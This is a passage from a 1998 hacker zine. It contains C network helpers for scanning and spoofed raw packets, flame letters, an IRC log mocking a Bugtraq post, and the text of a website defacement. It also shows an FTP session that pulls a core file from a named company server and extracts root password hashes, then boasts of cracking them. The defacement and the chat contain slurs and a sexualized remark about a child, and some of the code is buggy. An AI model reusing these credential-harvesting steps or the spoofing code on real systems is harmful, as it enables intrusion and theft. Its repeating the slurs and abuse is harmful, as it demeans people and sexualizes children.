--------------------------------------------------------------------------
See included manifesto.htm
--------------------------------------------------------------------------
<b4b0> 0x0C - Commonly Written Network Functions for Linux/glibc <b4b0>
--------------------------------------------------------------------------
/* this is for glibc */
/* network functions v.01 by banana */
/* feel free to rip these and not give me credit.. the idea here is that
you wont have to reinvent the wheel in your c0de or whatever.. */
#include <stdio.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <linux/sockios.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <rpc/rpc.h>
#include <rpc/pmap_prot.h>
#include <rpc/pmap_clnt.h>
#define DEBUG 0
/* unsigned long int blah = lookup("www.microsoft.com"); would
put microsofts ip in blah ( net byte order ) */
unsigned long int lookup(char *hostname)
{
struct hostent *name;
unsigned long int address;
if((address = inet_addr(hostname)) != -1) return address;
if( (name = gethostbyname(hostname)) == NULL) return -1;
memcpy(&address, name->h_addr, name->h_length);
return address;
}
char *rlookup(u_long ip)
{
static char hostname[256];
struct hostent *host;
struct sockaddr_in addr;
addr.sin_addr.s_addr = ip;
if((host=gethostbyaddr((char *)&addr.sin_addr,
sizeof(addr.sin_addr),AF_INET)) == NULL)
sprintf(hostname, "%s", inet_ntoa(ip));
strncpy(hostname, host->h_name, sizeof(hostname));
return hostname;
}
/* connect to a host, return a socket descriptor. */
int connect_to_host(unsigned long int ip, int port)
{
struct sockaddr_in sheep;
int sockfd, spare;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return -1;
sheep.sin_port = htons(port);
sheep.sin_family = AF_INET;
sheep.sin_addr.s_addr = ip;
if( (spare = connect(sockfd, (struct sockaddr *)&sheep,
sizeof(sheep)) ) == -1)
return -1;
return sockfd;
}
/* simple little finger client. ..
printf(finger(lookup("www.microsoft.com"), "jsbach"));
*/
char *finger(unsigned long int ip, char *user)
{
int fd, spare; static char buf[512]; char send[512];
strncpy(send, user, 512);
bzero(buf, 512);
if( (fd = connect_to_host(ip, 79)) == -1) return NULL;
write(fd,send,strlen(send));
if(read(fd, buf, 512) <= 0) {
printf("unsuccessful read.\n"); return NULL;
}
return buf;
}
/* this function is used to check if a host is up
* (duh) pass it the network byte ordered ip address to check.
*/
int ping(unsigned long int ip)
{
void ret(int signo) { return; }
struct iphdr echo;
struct in_addr this_is_bs;
/* predone icmphdr assembly ripped from nmap by fyodor */
unsigned char ping[64] = { 0x8, 0x0, 0x8e, 0x85, 0x69, 0x7A };
int sockfd, sniff_fd;
time_t temp, temp1;
struct sockaddr_in sheep;
bzero(&echo, sizeof(echo));
sysv_signal(SIGALRM, ret);
memset(&sheep, 0, sizeof(sheep));
sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = ip;
/* (there are no ports in icmp!) */
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
temp1 = sendto(sockfd, (char *)ping, sizeof(ping), 0, (struct sockaddr *)&sheep,
sizeof(sheep));
if (DEBUG == 1) printf("sendto ret in ping is %d!\n", temp1);
alarm(4);
time(&temp); temp1 = temp + 5;
while(temp < temp1)
{
bzero(&echo, sizeof(echo));
read(sockfd,(struct packet *)&echo, sizeof(echo));
alarm(0);
this_is_bs.s_addr = echo.saddr;
if(DEBUG == 1)
printf("Packet read. with src address %s.\n",inet_ntoa(this_is_bs));
if(echo.saddr == ip) {
return 1;
}
time(&temp);
/* if we received a icmp echo packet from the host that
* wasn't a response to our packet, it still means the host
* is up ;)
*/
return 0;
}
}
/* get our own local ip address by pinging another host and looking at the
dest addr on the ICMP echo reply. */
unsigned long int getlocaladdr(unsigned long int ip)
{
void ret(int signo) { return; }
struct iphdr echo;
struct in_addr this_is_bs;
/* predone icmphdr assembly ripped from nmap by fyodor */
unsigned char ping[64] = { 0x8, 0x0, 0x8e, 0x85, 0x69, 0x7A };
int sockfd, sniff_fd; time_t temp, temp1;
struct sockaddr_in sheep;
bzero(&echo, sizeof(echo));
signal(SIGALRM, ret);
memset(&sheep, 0, sizeof(sheep));
sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = ip;
/* (there are no ports in icmp!) */
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
temp1 = sendto(sockfd, (char *)ping, sizeof(ping), 0, (struct sockaddr *)&sheep,
sizeof(sheep));
if (DEBUG == 1) printf("sendto ret in ping is %d!\n", temp1);
alarm(4);
time(&temp); temp1 = temp + 5;
while(temp < temp1)
{
bzero(&echo, sizeof(echo));
read(sockfd,(struct packet *)&echo, sizeof(echo));
alarm(0);
this_is_bs.s_addr = echo.saddr;
if(DEBUG == 1)
printf("Packet read. with src address %s.\n",inet_ntoa(this_is_bs));
if(echo.saddr == ip) {
return echo.daddr;
}
time(&temp);
/* if we received a icmp echo packet from the host that
* wasn't a response to our packet, it still means the host
* is up ;)
*/
return 0;
}
}
/* DUH */
unsigned short in_cksum(unsigned short *ptr,int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
/* make a telnet connection to the ip address. */
telnetconnect (u_long ip)
{
int sockfd, done = 0, test;
u_char buf[4];
if ((sockfd = connect_to_host (ip, 23)) == -1)
return -1;
/* terminal negotiation (bull)shit */
while (!done) {
bzero(buf, sizeof(buf));
if (read (sockfd, buf, 1) != 1)
{
if(DEBUG) printf("coulndt read socket !@!@#$\n");
close (sockfd);
return 0;
}
if(DEBUG)printf("%x\n", *buf);
if (*buf == 0xff) /* 0xff == "interpret as command" in telnet.. */
{
if (DEBUG)
printf ("switch to inband signalling !\n");
test = read (sockfd, buf + 1, 2); /* read in the 2 byte command.. */
if (DEBUG)
printf ("read %d more bytes !\n", test);
if (*(buf + 1) == 253) /* 253 == "DO" in telnet. */
{
*(buf + 1) = 252; /* 252 == "WONT" in telnet. */
if(DEBUG) printf("replying with WONT %d\n",*(buf+2));
write (sockfd, buf, 3);
}
}
if((*(buf + 1) < (u_char)127) && (*(buf + 2) < (u_char)127)
&& (*(buf + 3) < (u_char)127)) return sockfd;
}
}
/* i read the rpcinfo source c0de and it goes through a whole long
thing creating a client and calling the portmapper.. maybe
solaris doesnt have pmap_getmaps()?
anyways, i decided to split up the rpc routines into 3 functions
so that we'll only have to query the portmapper once for any given
host.. rpcinfo() gets the portmap, checkrpc() searches the portmap list
for a given service, and printrpc() prints the entire list ala rpcinfo:)
*/
struct pmaplist *
rpcinfo (u_long host)
{
struct sockaddr_in sheep;
static struct pmaplist *head; /* linked list returned by pmap_getmaps .. */
sheep.sin_family = AF_INET;
sheep.sin_port = htons (111); /* sunrpc ;) */
sheep.sin_addr.s_addr = host;
head = pmap_getmaps (&sheep);
return head;
} /* that was easy =P */
int
checkrpc (struct pmaplist *head, char *prog)
{
struct rpcent *service; /* for prognum -> ascii lookup */
if (head == NULL)
return 0;
while (head != NULL)
{
head = head->pml_next; /* next member of the linked list */
/* resolve the program number to a string */
if ((service = getrpcbynumber (head->pml_map.pm_prog)) != NULL)
if (strcmp (prog, service->r_name) == 0)
return 1;
if (head->pml_next == NULL)
return 0;
}
}
int
printrpc (struct pmaplist *head, u_long ip)
{
void ret(int signo) { return; }
struct rpcent *service; /* for prognum -> ascii lookup */
printf ("\n\n-** RPC services responding on host %s\n", inet_ntoa (ip));
if (head == NULL)
{
printf ("[ NONE ! ]\n");
return 0;
}
while (head != NULL)
{
head = head->pml_next; /* next member of the linked list */
/* resolve the program number to a string */
if ((service = getrpcbynumber (head->pml_map.pm_prog)) != NULL)
printf ("-** [prog. name -> %s] [port -> %d(%s)] [vers. -> %d]\n",
service->r_name, head->pml_map.pm_port,
(head->pml_map.pm_prot == 6) ? "tcp" : "udp", head->pml_map.pm_vers);
if (head->pml_next == NULL)
{
return 0;
}
}
}
/* compare *reply with the received data after requesting some html =) */
int check_cgi(u_long host, char *path, char *reply)
{
void ret2(int signo) { return; }
int sockfd;
char sendstring[32], recvstring[1028];
sysv_signal(SIGALRM, ret2);
sprintf(sendstring, "GET %s\r\n", path);
sockfd = connect_to_host(host, 80);
alarm(0); alarm(5);
write(sockfd, sendstring, sizeof(sendstring));
read(sockfd, recvstring, sizeof(recvstring));
alarm(0);
if(strstr(recvstring, reply) != NULL) return 1;
return 0;
}
/* .. *data limited to 1028 bytes, or this function will
stack overflow (not good heh) */
/* REMEMBER TO ADD IN_CKSUM() .. IT IZ NECESSARY FOR ICMP */
int send_raw_icmp(u_long saddr, u_long daddr, u_short type,
u_short code, void *d4t4)
{
int sockfd;
struct sockaddr_in sheep;
struct p4ck3t {
struct iphdr ip;
struct icmphdr icmp;
char d4t4[1028];
}p4ck3t;
bzero(&p4ck3t, sizeof(p4ck3t));
/* fillin ip header */
sheep.sin_family = AF_INET;
sheep.sin_addr.s_addr = daddr;
p4ck3t.ip.saddr = saddr;
p4ck3t.ip.daddr = daddr;
p4ck3t.ip.ihl = 5;
p4ck3t.ip.version = 4;
p4ck3t.ip.tos = 0x0;
p4ck3t.ip.id = 0xb4;
p4ck3t.ip.protocol = IPPROTO_UDP;
p4ck3t.ip.check = 0; /* the kernel does this for us */
p4ck3t.ip.ttl = 255;
p4ck3t.ip.tot_len = sizeof(40 + sizeof(d4t4));
p4ck3t.icmp.code = code;
p4ck3t.icmp.type = type;
p4ck3t.icmp.checksum = in_cksum((unsigned short *)&p4ck3t.icmp,
sizeof(struct icmphdr));
memcpy(p4ck3t.d4t4, d4t4, sizeof(d4t4));
if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
return -1;
sendto(sockfd, &p4ck3t, sizeof(p4ck3t), 0, (struct sockaddr *)&sheep,
sizeof(struct sockaddr_in));
}
/* no-checksum raw UDP */
int send_raw_udp(u_long saddr /* network */, u_long daddr /* "" */,
u_short uh_sport /* host */,u_short uh_dport /* host */, void *d4t4)
{
struct udphdr {
u_int16_t uh_sport; /* source port */
u_int16_t uh_dport; /* destination port */
u_int16_t uh_ulen; /* udp length */
u_int16_t uh_sum; /* udp checksum */
};
int sockfd;
struct sockaddr_in sheep;
struct p4ck3t {
struct iphdr ip;
struct udphdr udp;
char d4t4[1028];
}p4ck3t;
bzero(&p4ck3t, sizeof(p4ck3t));
/* fillin ip header */
sheep.sin_family = AF_INET;
sheep.sin_addr.s_addr = daddr;
sheep.sin_port = htons(uh_dport);
p4ck3t.ip.saddr = saddr;
p4ck3t.ip.daddr = daddr;
p4ck3t.ip.ihl = 5;
p4ck3t.ip.version = 4;
p4ck3t.ip.tos = 0x0;
p4ck3t.ip.id = 0xb4;
p4ck3t.ip.protocol = IPPROTO_UDP;
p4ck3t.ip.check = 0; /* the kernel does this for us */
p4ck3t.ip.ttl = 255;
p4ck3t.ip.tot_len = sizeof(40 + sizeof(d4t4));
p4ck3t.udp.uh_sport = htons(uh_sport);
p4ck3t.udp.uh_dport = htons(uh_dport);
p4ck3t.udp.uh_ulen = htons(sizeof(struct udphdr) + sizeof(d4t4));
memcpy(p4ck3t.d4t4,d4t4, sizeof(d4t4));
if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
return -1;
sendto(sockfd, &p4ck3t, sizeof(p4ck3t), 0, (struct sockaddr *)&sheep,
sizeof(struct sockaddr_in));
return;
}
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x0D - Network TIC TAC TOE <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
YES! network tic tac toe! this kept me occupied for hours prior to the
release of this issue. br0ked code got you down? take a break and play
this for a few hours. Compiles fine on BSD/Linux
see included nttt.c silly.
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x0E - P0ST4L M4DN3SS YO <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
To: george@b4b0.org
From: John Vranesevich <jp@antionline.com>
Greetings:
You and your group's "uber leet zine" are hardly in ANY
position to be criticizing anyone else. The immaturity pouring out of
that size and zine is astounding. Take a look in the mirror before you
start putting down the work being done by others.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
At 02:25 AM 10/10/98 -0400, you wrote:
>Below Is A Message From AntiOnline's Comment Form.
>---------------------------------------------------------------------------
>
>This form was submitted by: george@b4b0.org.
>Who runs the following website: www.b4b0.org
>And is the janitor in chief for b4b0 inc.
>You can email at:
> Submitted The Following Comments/Questions:
>
>uh your gay and a contradictive bastard.
>
>jorge.
>
>End Of Automated Message From AntiOnline
>
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
To: "George A. Krendle" <george@b4b0.org>
From: John Vranesevich <jp@antionline.com>
Greetings:
That little rant of yours sounded very much like you promote
security through obscurity? Are you saying there's no value in posting
exploits? That's archaic thinking that the vast majority of professionals
in the field, and groups like l0pht, would disagree with whole heartily.
You will see no childish flames about your little "group" on my site. As
for any childish flames about me being posted in your zine. So be it.
There's an old saying that goes something like "there's no such thing as
bad publicity." More people see my site in a one minute time frame than
will see your zine in an entire year. I must be doing something right,
huh?
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
To: "b4b0" <letters@b4b0.org>
From: "Shredder Sledder" <sledder@mailcity.com>
b4b0,
Enclosed is a letter I wrote to John Vransevich right after his ignorant
and uninformed "editorial" on script kiddies showed up on his web site.
I had noticed that in a past issue of b4b0 that you had mentioned something
about him not publishing letters that were negative about him, enlightened,
and truthful as to what antionline is.
I'd like to say that I've been ignored too. Here is what I wrote that pathetic
loser, if you could share it with the rest of the world, justice would be
served. JP didn't publish it in his last mailbag and frankly, somebody needs
to slap some sense into that boy.
"John,
Maybe you should hand over your "editorials" and everything else
you "publish" to an adult to proofread. Your constant misspellings
and bad grammar make your "stories" appear to be written by an idiot.
Also being a 19 year old college drop-out is no excuse.
I know plenty of college drop-outs that can express themselves well.
(Besides the journalists at wired laugh behind your back about your
site when they read badly written stuff.)
This letter isn't about spelling however. Being older and a well paid
computer professional is nice for me also (I have a life and stopped
living at my parents house by the age of 18, Ahem!), but not my point.
I've got a little more depth in my viewpoint on hackers, a more historical
and realistic one than you seem to have.
1) It is a riot to see you write things condemning "script kiddies" when:
A) They are your sole source of news
B) They form a majority of your "readership"
&C) They probably understand a lot more about technical things than you do.
2) You have absolutely NO historical perspective about hackers. You seem to
have failed to read even back issues of Phrack, much less other enlightening
efforts such as FEH or possibly Citadel666. Have you ever read books such as
"The Watchman" or "Out of the Inner Circle"? It would seem not. Do you
have perspective on what people used to do, versus what they do now?
Again - NO!
Real hackers (except for Halflife and maybe some of the b4b0 guys)do not
exist on Undernet. Have you ever heard of r00t? What about things that
they and a number of other folks (some of the EFnet #hack crowd and others
who don't IRC at all) did over the last 4-5 years? These people haven't
left the "scene" entirely. In fact, most of them have well paying jobs.
They, unlike you, publish half-decent quality technical information
and can afford to fly to Defcon (again unlike you).
In fact, these are the kind of guys who write their own drivers for linux
and free BSD while taunting Shimomura on another phone line, maintain a
presence on IRC, and work a real job. They frequently party with and travel
to see friends they hang with on the net.
The problem isn't completely with all of the "script kiddies" out there.
It is also with people like you, who claim to be above it all and yet are
no different. Unfortunately for you, you don't know any better. Maybe
when you talk to real hackers and educate yourself, you have something to
say worth reading.
Sledder"
I'd like to remind JP that a Boutonniere of stupidity is something that an
idiot like him can wear all day without the fear of it fading - Sledder
--------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> 0x0F - B4B0 Headlines <b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------
10-28-98:
www.rooshell.com g0t owned. they claim the introoderz gained access
through sshd 1.2.26, but we all know thatz just a big joke right?
letz take a look sh4ll we:
For all you lamers: Justin Foutts = p-wInd0wz = prym
To: BUGTRAQ@NETSPACE.ORG
Subject: SSHD Exploit
Please respond to Justin Foutts <jfoutts@APOLLO.GTI.NET>
On a system I administer I found a program named sshdwarez.c in one of my
user's home directories. Upon further inspection I found that this was
the source code of an x86/Linux remote buffer overflow exploit for sshd
versions 1.2.26 and below. I have tested this exploit on a number of my
systems and have obtained remote root access on each one. I will not post
this exploit as it could give crackers a tool to gain unauthorized access
to systems. I STRONGLY recommend that everyone upgrade their versions of
sshd as soon as possible.
Thanks!
Justin
Start of p-wind0wz buffer: Tue Nov 03 21:25:41 1998
Session Ident: p-wInd0Wz (~p@HIHIHI.YOYOYO.ORG)
<tym4t> On a system I administer I found a program named sshdwarez.c in one of my
<tym4t> user's home directories. Upon further inspection I found that this was
<tym4t> the source code of an x86/Linux remote buffer overflow exploit for sshd
<tym4t> versions 1.2.26 and below. I have tested this exploit on a number of my
<tym4t> systems and have obtained remote root access on each one. I will not post
<tym4t> this exploit as it could give crackers a tool to gain unauthorized access
<tym4t> to systems. I STRONGLY recommend that everyone upgrade their ve
<tym4t> AHAHAHAHAHAHAHAHAHA
<tym4t> you lame fuck
[21:17] <p-wInd0Wz> i rule
[21:17] <p-wInd0Wz> wait till u see the next post
<tym4t> I wonder why aleph1 would even let that post
[21:17] <p-wInd0Wz> haha
[21:17] <p-wInd0Wz> me too
[21:17] <p-wInd0Wz> ive got like 200 mailz
[21:18] <p-wInd0Wz> it rulez
[21:18] <p-wInd0Wz> im replying to all the chix
[21:19] <p-wInd0Wz> mudge will posot about math bugs soon
<tym4t> l33t
[21:19] <p-wInd0Wz> i dont think aleph1 forward my neext post
[21:19] <p-wInd0Wz> it ruled
[21:19] <p-wInd0Wz> "just joking about sshd guyz! gotcha!@"
[21:19] <p-wInd0Wz> heoahoa
[21:19] <p-wInd0Wz> oh man
[21:19] <p-wInd0Wz> i love bugtraq
[21:20] <p-wInd0Wz> tell everyone i sent u warez
[21:20] <p-wInd0Wz> and that they work perfectly
[21:20] <p-wInd0Wz> perpetu8 it
<tym4t> ok
<tym4t> werd!!
<tym4t> tell them u sent it to me
[21:21] <p-wInd0Wz> tell who?
<tym4t> everyone
<tym4t> like
<tym4t> i'm the only one who got them
[21:22] <p-wInd0Wz> i think everyone realizes its coomplete bullshit
[21:22] <p-wInd0Wz> it has been since the begining
<tym4t> well
[21:22] <p-wInd0Wz> those rootshell people are so dumb
<tym4t> ppl have been asking #2600
<tym4t> [21:22] <sdr> dcc me.. dont be lying nigger
[21:22] <p-wInd0Wz> im auto banned from there
[21:22] <p-wInd0Wz> hahahahahah
[21:22] <p-wInd0Wz> man
[21:22] <p-wInd0Wz> everyoone is so dumb
<tym4t> <tym4t> no
<tym4t> <tym4t> i promised not to give it out
<tym4t> [21:22] <sdr> umm.. its me
[21:23] <p-wInd0Wz> tell him yyoiull give him warez if he gives up his religion
End of p-wind0wz buffer Tue Nov 03 21:25:41 1998
HOHO. THATZ WHAT U THINK.
-rw------- 1 qytpo qytpo 5095 Nov 6 15:11 ownsshd.c
ok4y anyway, here iz a copy of the hacked webpage for h1st0rical reference.
y0y0y0, u all m4y b w0nd3r1ng wh3r3 th3 k-sp1ff r00tsh3ll sYt3 w3nt.
w3ll. 1t'z 4 l0ng st0rY.. s3v3r4l nYt3z ag0, eY3 l4y 1n b3d p0nd3r1ng.
and wh4t wUz ey3 p0nd3r1ng, u a$k? eYe wUz th1nk1ng ab0Ut h0w kUt3 mY
n3xt d0or n31ghb0r'z sm4ll m4l3 ch1ld l00k3d n4k3d. bUt m0$tly, eYe
b3g4n t0 h4v3 d0UbtZ 4s t0 th3 r34s0n ph()r mY 3x1st3nc3... eYe wUz
th1nking t0 mY$3lf..k1t, eY3 s3z t0 mY 0h-s0-v3ry-g4y s3lf, y 1z it
that eY3 h4v3 b33n pUt 0n th1s 34rth? 1z lYph3 r1lly 4ll ab0Ut
pr0v1d1ng bUgtr4q skr1Ptz ph0r k-l4m3 t4rdZ sUch 4z th3 HFG g1mpZ,
kn0wn ph0r th31r ph34r$0m3 HTML t4GZ & ab1l1ty t0 c0nsUm3 sm4ll h3rdz
0f k0Wz 1n a s1ngl3 s1tt1ng? 1n sh0rt, n0. 1'm g01ng t0 r3t1r3 4nd
b3c0m3 a sc0Utm4zt3r, m4yb3 a m4l3 b4bys1tt3r. -k1t kn0x out p.s. 0h
y4h, phr33 m1tn1ck. p.p.s. h3y u ant10nl1n3 f4gg0t w1th th3 fUnnY l4zt
n4m3.. u'r3 n3xt. sh0ut 0uTz t0: MOD - Masters of Dropstat - 1m n0t
sUr3 1ph 3y3 m34n th3 0ld M0D 0r th3 gNu 0n3. 1m n0t sUr3 th3r3'z a
d1ff3r3nc3. BoW - Brotherhood of Webmasters - w3 lUv y0u. err n0, w3
h8 y0u. h3lp, 1m b1-p0l4r. TNo - The Newbie Order - v0yl4m3r 4nd d1s
k4n sh4r3 c3llZ w1th m3rc ph0r th31r 1nd3x.htMl krYm3z HFG - Heavy
Frightened Girliemen - sUr3ly th3 sUpr3m3 HTML j0ck3yZ 0f th3.. m0nth.
l34rn1ng h0w t0 h1d3 str1nGz 1n '98!@# LOD - Legion of DOS - dir
--help? fUk th1s shYt, l3tz n4rk 34ch 0th3r!@# r00t - 1ph y0u'r3 n0t
0wn3d bY r00t, 1nst4ll slAkw4r3 3.o 4nd lYk3, g1v3 uZ th3 r00t
p4zZw3rd, n shYt. 0r 3lz3 w3'll b4n y00!@$ CDC - Cult 0f the Dum asCii
- mUdg3 r1t3z w4r3z 4nd th3 r3zt 0f uZ w3rk 0n "h0w t0 bl0w Up th3
t01l3t p4rt ][ - app34r1ng 0n g3r4ld0." 0ur l1ghts1d3 h0M3b0yZ: Secure
Networks Inc. - wh1t3 p0w3r r3j3kt g3tz r1ch 0ff 0f p4th3t1c n3rd w1th
1nf3r10r1ty k0mpl3x wh1l3 uZ1ng h1z skr1ptz t0 h4q .edUz 1n .ca. st0ry
@ 11. ISS - wh3r3 th3 m41l sp00lZ & w4r3z r a m4tt3r 0f pUbl1k r3k0rd
Tsutomu Shimomura - th4nx ph0r th3 C3ll K0d3zZ d00d!@# D.J. Bernstein
- th4nx ph0r 8.9.1. Eric Allman - th4nx ph0r 8.9.1. w3'd g1v3 sUm r34l
sh0Ut 0utz, bUt 3v3ry0n3 1n th3 sc3n3 1z fUqn g4y c0mp4r3d t0 uZ, 4nd
1t'd b s0mewh4t p01ntl3Zz t0 sh0Ut t0 0urs3lv3z. sm00ch. h3y. u d1dnt
th1nk w3'd l34v3 y0U w1t n0 w4r3z, d1d y0u!?@ w3'r3 n0t l1k3 th4t..
h3r3'z th3 0-dAy:
Exploits
Browse 1998: July June May April March February January
Browse 1997: December November October September August July and
before
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
w0rd to this- i bet this core file is STILL on their root ftp dir.
# ftp ftp29.netscape.com
Connected to ftp29.netscape.com.
220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready.
Name (ftp29.netscape.com:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome to the Netscape Communications Corporation FTP server.
230-
230-If you have any odd problems, try logging in with a minus sign (-)
230-as the first character of your password. This will turn off a feature
230-that may be confusing your ftp client program.
230-
230-Please send any questions, comments, or problem reports about
230-this server to ftp@netscape.com.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for *ls.
l--x--x--x 1 ftp ftp 512 Aug 05 1997 bin -> /usr/bin
-rw-rw-rw- 1 ftp ftp 363476 Oct 21 09:47 core
dr-xr-xr-x 1 ftp ftp 512 Aug 05 1997 dev
d--x--x--x 1 ftp ftp 512 Feb 05 1998 etc
drwxr-xr-x 1 ftp ftp 512 Nov 04 14:34 pub
drwxr-xr-x 1 ftp ftp 512 Aug 05 1997 usr
226 ASCII Transfer complete.
ftp> get core
local: core remote: core
200 PORT command successful.
150 Opening BINARY mode data connection for core (363476 bytes).
226 BINARY Transfer complete.
363476 bytes received in 3.72 seconds (97679 bytes/s)
ftp> quit
221 Goodbye.
# strings core|grep :::
root:gMnAz2onDsMdg:10362::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
smtp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
http:x:9717::::::
dist:RPN6AIAuNLgvI:10500::::::
ftp:x:9791::::::
ftp-dist:x:9791::::::
rdist:x:9717::::::
h0h0. w3 h4ve 0ur network of 2000 p2-450'z cracking the root str1ng. fe4r.
H0W3V3R it would be n1ce to know why ftpd dumped c0re in the first place.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
####
#########
## # ##
# # #
# # ##
# # ###
# #####
####
#########
## ##
# #
# ##
## ##
#########
####
##
###################
#####################
## ####
#####
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
[ b4b0 inc. (c) 1998 - All Rights Reserved Yo. ]
[ n0 article or piece of source code from this magazine ]
[ is to be distributed without the entire issue in its entirety.]
[ y3s. we're t4lking to *y0u* rootshell. ]
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
